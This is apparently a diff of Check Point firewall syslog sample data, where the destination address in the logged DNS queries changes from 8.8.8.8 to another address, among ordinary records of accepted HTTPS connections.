-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48771"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44798"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34766"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48771"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44798"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34766"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52966"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35133"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35651"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35133"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35651"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38448"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33172"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35210"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33343"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33172"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35210"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33343"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.203"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44544"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.203"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44546"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.203"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44548"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56783"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33252"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56783"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33252"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d915,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61095"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d915,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55762"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x15,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54244"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d915,0x16,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"194.29.39.10"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62020"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10001"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33138"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
